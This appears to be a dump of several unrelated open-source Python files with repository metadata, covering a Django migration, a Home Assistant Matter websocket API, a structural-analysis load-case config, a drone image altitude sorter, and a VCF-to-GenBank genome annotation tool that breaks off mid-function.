migrations.AlterField(
model_name='urls',
name='init_url',
field=models.URLField(),
),
migrations.AlterField(
model_name='urls',
name='short_url',
field=models.URLField(),
),
]
|
[
"mahdi_bohloul@yahoo.com"
] |
mahdi_bohloul@yahoo.com
|
4261205d147bd377b81a8fb578bf7586b1f999d2
|
296132d2c5d95440b3ce5f4401078a6d0f736f5a
|
/homeassistant/components/matter/api.py
|
36cf83fd0dab7563414b7bed72aa10b48494fe9e
|
[
"Apache-2.0"
] |
permissive
|
mezz64/home-assistant
|
5349a242fbfa182159e784deec580d2800173a3b
|
997d4fbe5308b01d14ceabcfe089c2bc511473dd
|
refs/heads/dev
| 2023-03-16T22:31:52.499528
| 2022-12-08T02:55:25
| 2022-12-08T02:55:25
| 68,411,158
| 2
| 1
|
Apache-2.0
| 2023-03-10T06:56:54
| 2016-09-16T20:04:27
|
Python
|
UTF-8
|
Python
| false
| false
| 4,458
|
py
|
"""Handle websocket api for Matter."""
from __future__ import annotations
from collections.abc import Callable
from functools import wraps
from typing import Any
from matter_server.client.exceptions import FailedCommand
import voluptuous as vol
from homeassistant.components import websocket_api
from homeassistant.components.websocket_api import ActiveConnection
from homeassistant.core import HomeAssistant, callback
from .adapter import MatterAdapter
from .const import DOMAIN
ID = "id"
TYPE = "type"
@callback
def async_register_api(hass: HomeAssistant) -> None:
"""Register all of our api endpoints."""
websocket_api.async_register_command(hass, websocket_commission)
websocket_api.async_register_command(hass, websocket_commission_on_network)
websocket_api.async_register_command(hass, websocket_set_thread_dataset)
websocket_api.async_register_command(hass, websocket_set_wifi_credentials)
def async_get_matter_adapter(func: Callable) -> Callable:
"""Decorate function to get the MatterAdapter."""
@wraps(func)
async def _get_matter(
hass: HomeAssistant, connection: ActiveConnection, msg: dict
) -> None:
"""Provide the Matter client to the function."""
matter: MatterAdapter = next(iter(hass.data[DOMAIN].values()))
await func(hass, connection, msg, matter)
return _get_matter
def async_handle_failed_command(func: Callable) -> Callable:
"""Decorate function to handle FailedCommand and send relevant error."""
@wraps(func)
async def async_handle_failed_command_func(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict[str, Any],
*args: Any,
**kwargs: Any,
) -> None:
"""Handle FailedCommand within function and send relevant error."""
try:
await func(hass, connection, msg, *args, **kwargs)
except FailedCommand as err:
connection.send_error(msg[ID], err.error_code, err.args[0])
return async_handle_failed_command_func
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "matter/commission",
vol.Required("code"): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_matter_adapter
async def websocket_commission(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict[str, Any],
matter: MatterAdapter,
) -> None:
"""Add a device to the network and commission the device."""
await matter.matter_client.commission_with_code(msg["code"])
connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "matter/commission_on_network",
vol.Required("pin"): int,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_matter_adapter
async def websocket_commission_on_network(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict[str, Any],
matter: MatterAdapter,
) -> None:
"""Commission a device already on the network."""
await matter.matter_client.commission_on_network(msg["pin"])
connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "matter/set_thread",
vol.Required("thread_operation_dataset"): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_matter_adapter
async def websocket_set_thread_dataset(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict[str, Any],
matter: MatterAdapter,
) -> None:
"""Set thread dataset."""
await matter.matter_client.set_thread_operational_dataset(
msg["thread_operation_dataset"]
)
connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "matter/set_wifi_credentials",
vol.Required("network_name"): str,
vol.Required("password"): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_matter_adapter
async def websocket_set_wifi_credentials(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict[str, Any],
matter: MatterAdapter,
) -> None:
"""Set WiFi credentials for a device."""
await matter.matter_client.set_wifi_credentials(
ssid=msg["network_name"], credentials=msg["password"]
)
connection.send_result(msg[ID])
|
[
"noreply@github.com"
] |
noreply@github.com
|
bd91cb8c7e9e1344cfd7f3d1410c23d658e9438d
|
ba054fa1ec409011444e9c6b963309745e150d6f
|
/ps_bole_calculs_statiques/xc_model_impact/loadStateData.py
|
69e20459fe07531c2303bcc316ffa946b24e867d
|
[] |
no_license
|
berndhahnebach/XCmodels
|
a6500fdde253dea10ef2bb64b7ebc3dbfc2577c2
|
4acdd7747abd7cd71f5ef580f65e93359560e5a9
|
refs/heads/master
| 2020-04-02T23:36:36.385054
| 2018-10-20T16:49:21
| 2018-10-20T16:49:21
| 154,873,006
| 0
| 0
| null | 2018-10-26T17:52:36
| 2018-10-26T17:52:35
| null |
UTF-8
|
Python
| false
| false
| 5,140
|
py
|
# -*- coding: utf-8 -*-
'''In this script we define default data of load cases to be used (or changed)
while displaying loads or results associated to single load cases
'''
from postprocess.reports import graphical_reports
'''
Definition of record objects with these attributes:
loadCaseName: name of the load case to be depicted
loadCaseDescr: description text of the load case
loadCaseExpr: mathematical expression to define the load case (ex:
'1.0*GselfWeight+1.0*DeadLoad')
setsToDispLoads: ordered list of sets of elements to display loads
setsToDispBeamLoads: ordered list of sets of beam elements to display loads
(defaults to [])
compElLoad: component of load on beam elements to be represented
available components: 'axialComponent', 'transComponent',
'transYComponent','transZComponent'
unitsScaleLoads: factor to apply to loads if we want to change
the units (defaults to 1).
unitsLoads: text to especify the units in which loads are
represented (defaults to 'units:[m,kN]')
vectorScaleLoads: factor to apply to the vectors length in the
representation of loads (defaults to 1 -> auto-scale).
vectorScalePointLoads: factor to apply to the vectors length in the
representation of nodal loads (defaults to 1).
multByElemAreaLoads: boolean value that must be True if we want to
represent the total load on each element
(=load multiplied by element area) and False if we
are going to depict the value of the uniform load
per unit area (defaults to False)
listDspRot: ordered list of displacement or rotations to be displayed
available components: 'uX', 'uY', 'uZ', 'rotX', rotY', 'rotZ'
(defaults to ['uX', 'uY', 'uZ'])
setsToDispDspRot: ordered list of sets of elements to display displacements
or rotations
unitsScaleDispl: factor to apply to displacements if we want to change
the units (defaults to 1).
unitsDispl: text to especify the units in which displacements are
represented (defaults to '[m]'
listIntForc: ordered list of internal forces to be displayed as scalar field
over «shell» elements
available components: 'N1', 'N2', 'M1', 'M2', 'Q1', 'Q2'
(defaults to ['N1', 'N2', 'M1', 'M2', 'Q1', 'Q2'])
setsToDispIntForc: ordered list of sets of elements (of type «shell»)to
display internal forces
listBeamIntForc: ordered list of internal forces to be displayed
as diagrams on lines for «beam» elements
available components: 'N', 'My', 'Mz', 'Qy', 'Qz','T'
(defaults to ['N', 'My', 'Mz', 'Qy', 'Qz','T'])
setsToDispBeamIntForc: ordered list of sets of elements (of type «beam»)to
display internal forces (defaults to [])
scaleDispBeamIntForc: tuple (escN,escQ,escM) correponding to the scales to
apply to displays of, respectively, N Q and M beam internal
forces (defaults to (1.0,1.0,1.0))
unitsScaleForc: factor to apply to internal forces if we want to change
the units (defaults to 1).
unitsForc: text to especify the units in which forces are
represented (defaults to '[kN/m]')
unitsScaleMom: factor to apply to internal moments if we want to change
the units (defaults to 1).
unitsMom: text to especify the units in which bending moments are
represented (defaults to '[kN.m/m]')
viewName: name of the view that contains the renderer (available standard
views: "XYZPos", "XYZNeg", "XPos", "XNeg","YPos", "YNeg",
"ZPos", "ZNeg", "+X+Y+Z", "+X+Y-Z", "+X-Y+Z", "+X-Y-Z",
"-X+Y+Z", "-X+Y-Z",
"-X-Y+Z", "-X-Y-Z") (defaults to "XYZPos")
hCamFct: factor that applies to the height of the camera position
in order to change perspective of isometric views
(defaults to 1, usual values 0.1 to 10)
viewNameBeams: name of the view for beam elements displays (defaults to "XYZPos")
hCamFctBeams: factor that applies to the height of the camera position for
beam displays (defaults to 1)
'''
A1=graphical_reports.RecordLoadCaseDisp(loadCaseName='A1',loadCaseDescr='A1: impact on parapet head',loadCaseExpr='1.0*A1',setsToDispLoads=[totalSet],setsToDispDspRot=[shells],setsToDispIntForc=[totalSet])
A1.unitsScaleLoads= 1e-3
A1.unitsScaleForc= 1e-3
A1.unitsScaleMom= 1e-3
A1.unitsScaleDispl= 1e3
A1.viewName= "-X+Y+Z"
A1.unitsDispl='[mm]'
A2=graphical_reports.RecordLoadCaseDisp(loadCaseName='A2',loadCaseDescr='A2: impact on parapet body',loadCaseExpr='1.0*A2',setsToDispLoads=[totalSet],setsToDispDspRot=[shells],setsToDispIntForc=[totalSet])
A2.unitsScaleLoads= 1e-3
A2.unitsScaleForc= 1e-3
A2.unitsScaleMom= 1e-3
A2.unitsScaleDispl= 1e3
A2.viewName= "-X+Y+Z"
A2.unitsDispl='[mm]'
|
[
"ana.Ortega.Ort@gmail.com"
] |
ana.Ortega.Ort@gmail.com
|
5bed36efedd9b5290786cb93423213be9d9e8ebf
|
30d7952013d8bc1fc798813e819de83276229fca
|
/altitudeOrganize_V2.py
|
ebf16f520338735aa84d65a3486ac94be6f74050
|
[] |
no_license
|
ChrisZarzar/uas-boundary-layer
|
2d0ed6d63d1b7e7d741fd8909adb4bd72de9a99a
|
805b87e2d769872bee952d9dee6697ad14425800
|
refs/heads/master
| 2020-05-17T10:13:24.927928
| 2019-04-26T15:30:50
| 2019-04-26T15:30:50
| 183,652,003
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,148
|
py
|
"""
Purpose: Purpose: This script will create
a textfile list of the altitude information
extracted from images in a directory.
"""
__version__ = "$Revision: 2.0 $"[11:-2]
__date__ = "$Date: 2017/05/30 12:09:47 $"[7:-2]
__author__ = "Chris Zarzar <chriszarzar@gmail.com>"
"""
Author: Chris Zarzar
Purpose: This script will extract gps information from the
North Farm Experiment Canon DSLR camera and will
copy the images into folders depending on their GPS information
Requirements:
1. Python Image Library (PIL)
2. ExifRead
3. imageinfo
a. gpsExtract
______________________________________________________________________________
#### HISTORY ####
21-jun-2016 [Chris Zarzar]: Created
30-may-2017 [Chris Zarzar]: Edited; Adjusted to make more intuative by creating
necessary directories and searching.
______________________________________________________________________________
"""
from imageinfo import gpsExtract
import os
import shutil
imageDir = "C:\\Users\\chris\\OneDrive\\Desktop\\Research\\NorthFarm_Experiment\\canon"
#create required directories
orgDir = imageDir + "/canonOrganized"
if not os.path.exists(orgDir):
os.makedirs(orgDir)
altVector = (30,100,200,300,400,500,600,700,800)
for x in altVector:
if not os.path.exists(orgDir+"/"+str(x)):
os.makedirs(orgDir+"/"+str(x))
try:
# Loop through the image directory and extract metadata information from each image.
for dirName, subdirList, fileList in os.walk(imageDir):
for fname in fileList:
if fname.endswith('.jpg') or fname.endswith('.JPG'):
print "Extracting GPS information from %s" % fname
fpath = dirName+"\\"+fname
gpsInfo = gpsExtract.gpsInfo
gpsOut = gpsInfo(fpath)
if 6<= (gpsOut[2]- 87.2) <=12:
outDir = orgDir+"/30"
shutil.copy2(fpath, outDir)
elif 27<= (gpsOut[2]- 87.2) <=33:
outDir = orgDir+"/100"
shutil.copy2(fpath, outDir)
elif 57<= (gpsOut[2]- 87.2) <=63:
outDir = orgDir+"/200"
shutil.copy2(fpath, outDir)
elif 88<= (gpsOut[2]- 87.2) <=94:
outDir = orgDir+"/300"
shutil.copy2(fpath, outDir)
elif 118<= (gpsOut[2]- 87.2) <=123:
outDir = orgDir+"/400"
shutil.copy2(fpath, outDir)
elif 149<= (gpsOut[2]- 87.2) <=155:
outDir = orgDir+"/500"
shutil.copy2(fpath, outDir)
elif 179<= (gpsOut[2]- 87.2) <=185:
outDir = orgDir+"/600"
shutil.copy2(fpath, outDir)
elif 210<= (gpsOut[2]- 87.2) <=216:
outDir = orgDir+"/700"
shutil.copy2(fpath, outDir)
elif 240<= (gpsOut[2]- 87.2) <=246:
outDir = orgDir+"/800"
shutil.copy2(fpath, outDir)
except:
pass
print "Processing complete"
##END##
|
[
"cmzarzar@gmail.com"
] |
cmzarzar@gmail.com
|
2e35a7f0f323931f6f815ef376f0ecbb345c6106
|
19acbc03360d373071a4ddb74855b7087e074089
|
/contents/vcf_to_genbank.py
|
b19dd134ec896769bf2ddcb7d0b86bd81b84afd8
|
[] |
no_license
|
glebkuznetsov/recoli_c321d_genome_annotation
|
5452d5418e52374c429ac974150f5d0e27e11a93
|
25f3caba9d62f7741cebcdbb3eeefd831f703f2b
|
refs/heads/master
| 2021-05-28T01:11:27.200718
| 2014-12-01T06:13:00
| 2014-12-01T06:13:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 51,947
|
py
|
"""
Methods for impressing the changes in a VCF file onto an existing
Genbank file.
NOTES:
* Look into insertion annotations being 1 off (specifically galk insertion at SIR.30.31i
* Annotation of deletion d_mg1655_66564_66733 partial deletion of repeat region 66564 66733 seems to be one off.
"""
import copy
import csv
import os
import pickle
from Bio import SeqIO
from Bio.SeqFeature import FeatureLocation
from Bio.SeqFeature import SeqFeature
from Bio.SeqRecord import SeqRecord
import vcf
from biopython_util import add_feature_to_seq_record
from biopython_util import delete_interval
from biopython_util import insert_sequence_and_update_features
from refactor_config import GENOMES_DIR
###############################################################################
# File locations
###############################################################################
REC1_C321D_ROOT = os.path.join(GENOMES_DIR, 'rec1_c321d')
###############################################################################
# Constants
###############################################################################
VARIANT_ANNOTATION_TYPE = 'variation'
MAX_REPLACE_CHARS = 12
###############################################################################
# Helper objects used by the main procedure
###############################################################################
class RuntimeLiftover(object):
"""Object that aids in dynamically updating a genome record with a list of
positions that are relative to the original genome record.
An example of a case where this is useful is when you are creating a
mapping from a vcf record which shows SNPs and other variants relative
to a reference genome.
For example, say you have two insertions:
* A - position: 100, size: 3
* B - position: 200, size: 4
When we introduce the first insertion, the frame of the underlying genome
has shifted, so that the second insertion should really be added at
position 200 + 3.
"""
def __init__(self, original_genome_record):
"""Constructor.
"""
# The original record. This remains unchanged throughout the
# mapping process.
# TODO: Do we even need to be keeping track of this? Or are intervals
# sufficient?
self.source_genome_record = original_genome_record
# Structure that maintains the mapping of intervals.
# Let's say we guarantee that it's sorted and exclusive, for now.
# NOTE: Each interval maintains a one-to-one mapping and so is
# inclusive bounds on both ends.
self._interval_mapping = self._initialize_interval_mapping()
def _initialize_interval_mapping(self):
"""Initializes the interval mapping.
"""
# The initial mapping is a list with a single element, which is
# a pair of tuples representing the correspondence between the original
# whole sequence interval and a copy of itself.
original_interval = (0, len(self.source_genome_record) - 1)
initial_mapping_pair = (original_interval, copy.copy(original_interval))
return [initial_mapping_pair]
@classmethod
def from_pickled_intervals(cls, original_genome_record, pickle_dest):
"""Factory method that creates a RuntimeLiftover object and sets
the intervals from a pickle file.
The original genome record still has to be provided.
"""
runtime_liftover = cls(original_genome_record)
with open(pickle_dest) as pickle_fh:
runtime_liftover._interval_mapping = pickle.load(pickle_fh)
return runtime_liftover
def pickle_interval_mapping(self, pickle_dest):
"""Pickle the interval mapping and write to file.
This is useful for debugging intervals and developing other output
formats.
"""
with open(pickle_dest, 'w') as pickle_fh:
pickle.dump(self._interval_mapping, pickle_fh)
def write_chain_file(self, chain_file_dest):
"""Writes the current state of _interval_mapping in the UCSC
liftover chain file format.
See: http://genome.ucsc.edu/goldenPath/help/chain.html
"""
with open(chain_file_dest, 'w') as chain_file_fh:
# Write the heading.
chain_file_fh.write('chain\n')
# Each row is of the form 'size dt dq', separated by spaces.
# * size: the size of the ungapped alignment
# * dt: the difference between the end of this block and the
# beginning of the next block (reference sequence)
# * dq: the difference between the end of this block and the
# beginning of the next block (query sequence)
# NOTE: The last line of the alignment section contains only one
# number: the ungapped alignment size of the last block.
interval_index = 0
num_interval_mappings = len(self._interval_mapping)
for interval_index in range(num_interval_mappings):
# I am using the names '*reference*' and '*query*' in the sense
# that the chain file uses them, where query sequence is the one
# whose coordinates we are generally trying to convert into the
# frame of the target. Typically the query sequence is the one
# we mapped the VCF changes on top of.
(current_reference_interval, current_query_interval) = (
self._interval_mapping[interval_index])
size = bases_in_interval(current_reference_interval)
next_interval_index = interval_index + 1
if next_interval_index < num_interval_mappings:
(next_reference_interval, next_query_interval) = (
self._interval_mapping[next_interval_index])
dt = (next_reference_interval[0] -
current_reference_interval[1] - 1)
dq = (next_query_interval[0] -
current_query_interval[1] - 1)
chain_file_fh.write('%d %d %d\n' % (size, dt, dq))
else:
# This is the last line. Just write the block size.
chain_file_fh.write('%d\n' % (size,))
def convert_source_position_to_target(self, source_position, or_next=False):
"""Converts a single position in the source genome to the corresponding
position in the target genome (the one being updated).
Args:
source_position: Position in the source genome. (0-indexed).
or_next: If True, when no direct mapping, return the next position.
Returns:
The position in the target genome, or None if mapping failed.
"""
assert isinstance(source_position, int), "source_position must be int."
# For now, the algorithm is to first search every interval in the
# internal interval mapping data structure until we find the one that
# the source position lies in, and then find the corresponding target
# position by using the relative offset of the source position within
# the interval.
for mapping_index in xrange(len(self._interval_mapping)):
source_interval, target_interval = self._interval_mapping[
mapping_index]
if source_interval[0] <= source_position <= source_interval[1]:
interval_index = source_position - source_interval[0]
return target_interval[0] + interval_index
if or_next and source_position < source_interval[0]:
return self.convert_source_position_to_target(
source_interval[0], or_next=or_next)
return None
def convert_target_position_to_source(self, target_position):
"""Converts a single position in the target genome to the corresponding
position in the source genome (the one being updated).
Similar, but more limited than convert_source_position_to_target().
Args:
target_position: Position in the target genome. (0-indexed).
Returns:
The position in the source genome, or None if mapping failed.
"""
assert isinstance(target_position, int), "target_position must be int."
for mapping_index in xrange(len(self._interval_mapping)):
source_interval, target_interval = self._interval_mapping[
mapping_index]
if target_interval[0] <= target_position <= target_interval[1]:
interval_index = target_position - target_interval[0]
return source_interval[0] + interval_index
return None
def handle_insertion(self, variant_data):
"""Handles an insertion with the given data spec.
"""
# Create a new interval mapping and replace the member attribute
# at the end.
new_interval_mapping = []
# Parse the insert data object.
insert_position = variant_data['position']
insert_sequence = variant_data['sequence']
len_insert_sequence = len(insert_sequence)
# We use a state machine strategy to first find the interval
# to insert, and then update all downstream target intervals.
STATE_SEARCHING = 'SEARCHING'
STATE_UPDATING_TARGET_DOWNSTREAM = 'UPDATING_TARGET_DOWNSTREAM'
state = STATE_SEARCHING
for idx, (source_interval, target_interval) in enumerate(
self._interval_mapping):
if state == STATE_SEARCHING:
if source_interval[0] <= insert_position <= source_interval[1]:
insert_position_index = insert_position - source_interval[0]
# The source simply gets split.
new_source_interval_upstream = (source_interval[0],
insert_position - 1)
new_source_interval_downstream = (insert_position,
source_interval[1])
# The target gets split, with the downstream interval
# shifted by the size of the insertion sequence.
new_target_interval_upstream = (target_interval[0],
target_interval[0] + insert_position_index - 1)
new_target_interval_downstream = (target_interval[0] +
insert_position_index + len_insert_sequence,
target_interval[1] + len_insert_sequence)
# Append the split sequence pairs.
new_interval_mapping.append((new_source_interval_upstream,
new_target_interval_upstream))
new_interval_mapping.append((new_source_interval_downstream,
new_target_interval_downstream))
# Update the state for remaining iterations.
state = STATE_UPDATING_TARGET_DOWNSTREAM
elif insert_position < source_interval[0]:
# The insert_position was deleted. Shift the target
# interval downstream by the size of the insertion.
new_source_interval = (
source_interval[0],
source_interval[1])
new_target_interval = (
target_interval[0] + len(insert_sequence),
target_interval[1] + len(insert_sequence))
assert (bases_in_interval(new_source_interval) ==
bases_in_interval(new_target_interval))
new_interval_mapping.append((new_source_interval,
new_target_interval))
state = STATE_UPDATING_TARGET_DOWNSTREAM
else:
new_interval_mapping.append(
(source_interval, target_interval))
else:
# Shift all remaining target intervals.
new_target_interval = (
target_interval[0] + len_insert_sequence,
target_interval[1] + len_insert_sequence)
new_interval_mapping.append((source_interval,
new_target_interval))
if state == STATE_SEARCHING:
raise RuntimeError("Error updating RuntimeLiftover with %s", (
str(variant_data,)))
self._interval_mapping = new_interval_mapping
def handle_deletion(self, variant_data):
"""Handles a deletion with the given data spec.
Args:
variant_data: Dictionary with keys:
* interval: A two-tuple representing pythonic interval for the
deletion, i.e. (inclusive_start, exclusive_end).
e.g. (100, 102) is a deletion of the 2 bases at positions
100 and 101. Relative to the source genome.
"""
interval = variant_data['interval']
for source_position in range(*interval):
delete_position = self.convert_source_position_to_target(
source_position, or_next=True)
delete_position = interval[0]
delete_interval_size = 1
# Create a new interval mapping and replace the member attribute
# at the end.
new_interval_mapping = []
# We use a state machine strategy to first find the interval
# to delete, and then update all downstream target intervals.
STATE_SEARCHING = 'SEARCHING'
STATE_UPDATING_TARGET_DOWNSTREAM = 'UPDATING_TARGET_DOWNSTREAM'
state = STATE_SEARCHING
for source_interval, target_interval in self._interval_mapping:
if state == STATE_SEARCHING:
if source_interval[0] <= delete_position <= source_interval[1]:
delete_position_index = delete_position - source_interval[0]
# The source simply gets split, dropping a base.
new_source_interval_upstream = (source_interval[0],
delete_position - 1)
new_source_interval_downstream = (
delete_position + delete_interval_size,
source_interval[1])
# The target gets split, including the position, but
# reducing the size of this and all following intervals.
new_target_interval_upstream = (target_interval[0],
target_interval[0] + delete_position_index - 1)
new_target_interval_downstream = (
target_interval[0] + delete_position_index,
target_interval[1] - delete_interval_size)
# Append the split sequence pairs.
new_interval_mapping.append((new_source_interval_upstream,
new_target_interval_upstream))
new_interval_mapping.append((new_source_interval_downstream,
new_target_interval_downstream))
# Update the state for remaining iterations.
state = STATE_UPDATING_TARGET_DOWNSTREAM
elif delete_position < source_interval[0]:
# The interval this delete_position would have fallen
# into has been deleted, effectively delete the first
# position in this current interval.
new_source_interval = (source_interval[0] + 1,
source_interval[1])
new_target_interval = (target_interval[0],
target_interval[1] - 1)
new_interval_mapping.append((new_source_interval,
new_target_interval))
state = STATE_UPDATING_TARGET_DOWNSTREAM
else:
new_interval_mapping.append(
(source_interval, target_interval))
else: # state == STATE_UPDATING_TARGET_DOWNSTREAM
# Shift all remaining target intervals.
new_target_interval = (
target_interval[0] - delete_interval_size,
target_interval[1] - delete_interval_size)
new_interval_mapping.append(
(source_interval, new_target_interval))
if state == STATE_SEARCHING:
raise RuntimeError("Error updating RuntimeLiftover for %s" % (
str(variant_data,)))
self._interval_mapping = new_interval_mapping
def bases_in_interval(interval):
"""Returns the number of bases in the liftover interval.
These are inclusive on both ends, not Pythonic that is.
"""
return interval[1] - interval[0] + 1
class VCFToGenbankMaker(object):
"""Object that encapsulates the logic for updating a genbank file
with changes from a vcf file.
Usage:
1. Construct an instance according to the constructor signature.
2. Call run().
"""
def __init__(self, genome_record, vcf_path, sample_id,
manual_updates_filepath=None):
"""Constructor.
"""
# Keep a copy of the original genome record.
self.original_genome_record = copy.deepcopy(genome_record)
# The record that is mutated as we progress.
self.genome_record = genome_record
# Save the path to the vcf. We'll use the vcf.Reader stream reader
# object when we actually need to handle it.
self.vcf_path = vcf_path
# The specific sample in the vcf.
self.sample_id = sample_id
# Location with manual updates. Might be None.
self.manual_updates_filepath = manual_updates_filepath
# Object used to track the dynamically changing interval mapping
# positions in the original genome record with respect to which
# vcf positions were identified to the most up-to-date genome.
self.runtime_liftover = RuntimeLiftover(self.original_genome_record)
def run(self, verbose=False, log_file=None):
"""Performs the actual updating.
"""
# Manually add annotations for TAG.
add_TAG_annotations(self.genome_record)
# Add changes made manually.
if self.manual_updates_filepath:
if verbose: print '...Handling manual updates...'
self.handle_manual_updates()
if verbose: print '...Done handling manual updates.'
# Extra data to add to features.
position_to_data_map = get_vcf_metadata()
# Keep track of which vcf changes were actually made.
vcf_positions_updated = []
if verbose: print 'Handling vcf...'
with open(self.vcf_path) as vcf_fh:
vcf_reader = vcf.Reader(vcf_fh)
sample_index = vcf_reader.samples.index(self.sample_id)
for idx, record in enumerate(vcf_reader):
if verbose: print idx, record
# metadata = position_to_data_map.get(record.POS, None)
metadata = None
was_change_made = self.handle_vcf_record(
record, sample_index, metadata)
assert isinstance(was_change_made, bool), (
"handle_vcf_record() must return a boolean.")
if was_change_made:
vcf_positions_updated.append(record.POS)
# Write debug output for which changes were actually made.
if log_file:
with open(log_file, 'w') as log_fh:
for pos in vcf_positions_updated:
log_fh.write(str(pos) + '\n')
def handle_manual_updates(self):
"""Adds manual updates from an external file with the following
tab-separated fields:
* Cassette
* Comment
* LP
* RP
* Sequence
"""
assert self.manual_updates_filepath, "No manual updates specified."
with open(self.manual_updates_filepath) as fh:
line = fh.readline() # Skip the header.
line = fh.readline()
while line:
# Parse the arguments.
args = line.split('\t')
if not len(args) >= 3:
line = fh.readline()
continue
fix_id = args[0]
note = args[1]
left_bp = int(args[2].strip())
right_bp = int(args[3].strip())
if len(args) == 5 and len(args[4].strip()):
seq = args[4].strip()
else:
seq = None
# Process the args to get the data necessary to make the update.
pythonic_start = left_bp - 1
pythonic_end = right_bp - 1
ref = str(self.original_genome_record.seq[
pythonic_start:pythonic_end])
if seq:
alt = seq
else:
alt = ''
# Make the update for this record.
self._update_genome_record_for_variant(
pythonic_start, ref, alt, note)
# Continue to next line.
line = fh.readline()
# def add_cassette_modifications(self, cassette_modifications_csv):
# """Method that allows adding modifications to a cassette relative
# to the starting position of the cassette.
# This might be desired where the cassettes come from some canonical
# source, but in the current context they have modifications.
# Args:
# cassette_modifications_csv: List of modifications to make, described
# with the following columns:
# * cassette_id: Unique id for the cassette as provided in the
# manual updates file.
# * comment
# * position: 1-based index of the mutation start.
# * ref: What was there previously.
# * alt: The alternate value for the position. Currently in
# vcf output format with square brackets.
# """
# with open(variant_data_csv) as csv_fh:
# csv_reader = csv.DictReader(csv_fh)
# for row in csv_reader:
# pass
def update_from_variant_data_csv(self, variant_data_csv):
"""Updates the genome given a list of variants in a csv.
Args:
variant_data_csv: Path to .csv file containing the following cols:
Required:
* position - Position in the starting genome.
* ref - Reference sequence at that position.
* alt - The alternative to replace with.
Optional:
* note - A note to add to the data.
"""
with open(variant_data_csv) as csv_fh:
csv_reader = csv.DictReader(csv_fh)
for row in csv_reader:
pythonic_start = int(row['position']) - 1
ref = row['ref']
# NOTE: Hacky way of parsing that works for the way that
# our particular data looks.
alt = row['alt'][1:-1]
if 'note' in row:
note = row['note']
else:
note = None
# Make the update for this record.
self._update_genome_record_for_variant(
pythonic_start, ref, alt, note=note)
def handle_vcf_record(self, record, sample_index, metadata=None):
"""Decides what to do with a single VCF call.
"""
# The specific sample for this record.
# NOTE: The vcf may have been generated across many samples at the
# same time but this script only operates on a single sample.
sample = record.samples[sample_index]
# If not called, then nothing to do.
if not sample.called:
return False
# Get the reference and alternate for this call.
# NOTE: We reduce generality from what pyvcf since we are dealing
# with a single sample.
phase_char = sample.gt_phase_char()
alts = sample.gt_bases.split(phase_char)
# TODO: Figure out proper way to handle homozygous vs heterozygous.
# assert len(set(alts)) == 1, (
# "Error while processing %s.\n"
# "We presently only support homozygous calls" %
# (str(record)))
# HACK: For now, if we see a record that we should handle, we
# assume that we should take the first alt that is different than
# the ref.
ref = record.REF
for alt_candidate in alts:
alt = alt_candidate
if alt == ref:
continue
pythonic_position = record.POS - 1
try:
return self._update_genome_record_for_variant(
pythonic_position, ref, alt, metadata=metadata)
except AssertionError as e:
raise AssertionError(
"AssertionError while fixing record %s\n%s" % (
str(record), str(e)))
def _update_genome_record_for_variant(self, pythonic_position, ref, alt,
note=None, metadata=None):
"""Updates self.genome_record with the passed in data.
Logic extracted into own method for testing.
"""
ref = ref.upper()
alt = alt.upper()
if ref == alt:
# Nothing to do.
return False
# First, check whether the genome already looks like what it would
# after the variant is fixed. We do this by fake-removing the ref
# and adding the alt.
# NOTE: One specific case that causes this issue is when we are
# manually making the TAG changes before applying the rest of the
# variants called in the VCF. This may bite us down the road, but this
# whole script should probably be re-written in the near future.
first_base_position = (
self.runtime_liftover.convert_source_position_to_target(
pythonic_position, or_next=True))
fake_seq = str(
self.genome_record.seq[:first_base_position] +
alt +
self.genome_record.seq[first_base_position + len(ref):])
if (fake_seq == str(self.genome_record.seq)):
# Nothing to do.
return False
# The reason we don't just switch out the sequence above is that
# we need to get the annotations right.
# NOTE: Or is the above actually a more elegant way to do what follows?
# Now determine the kind of mutation.
if _is_snp(ref, alt):
return self.handle_snp({
'position': pythonic_position,
'ref': ref,
'alt': alt
}, metadata=metadata)
elif _is_deletion(ref, alt):
deleted_subseq = _get_deletion(ref, alt)
deleted_subseq_index_start = ref.rindex(deleted_subseq)
assert len(deleted_subseq) == len(ref) - deleted_subseq_index_start
deleted_subseq_start = (pythonic_position +
deleted_subseq_index_start)
return self.handle_deletion({
'interval': (deleted_subseq_start,
deleted_subseq_start + len(deleted_subseq)),
'validation_seq': deleted_subseq
}, note=note, metadata=metadata)
elif _is_insertion(ref, alt):
insertion_seq = _get_insertion(ref, alt)
alt_insertion_start_index = alt.rindex(insertion_seq)
assert len(insertion_seq) == len(alt) - alt_insertion_start_index, (
"Error handling insertion: ref: %s, alt: %s, position: d" %
(ref, alt, pythonic_position))
insertion_start = pythonic_position + alt_insertion_start_index
return self.handle_insertion({
'position': insertion_start,
'sequence': insertion_seq
}, note=note, metadata=metadata)
else:
# Since we can't exactly tell, just delete ref and insert alt.
validation_seq = str(self.original_genome_record.seq[
pythonic_position:pythonic_position + len(ref)])
self.handle_deletion({
'interval': (pythonic_position,
pythonic_position + len(ref)),
'validation_seq': validation_seq
}, add_annotation=False)
self.handle_insertion({
'position': pythonic_position,
'sequence': alt
}, add_annotation=False)
#### Calculate data for the annotation.
# The source interval is the interval that was removed
# from the source.
source_interval = (pythonic_position, pythonic_position + len(ref))
# The insertion is not mapped in the liftover after the insertion,
# so grab the starting position.
target_genome_start = (
self.runtime_liftover.convert_source_position_to_target(
pythonic_position - 1, or_next=True) + 1)
feature_id = 'misc_variant_source_%d-%d' % source_interval
feature_location = FeatureLocation(
target_genome_start,
target_genome_start + len(alt))
feature = SeqFeature(
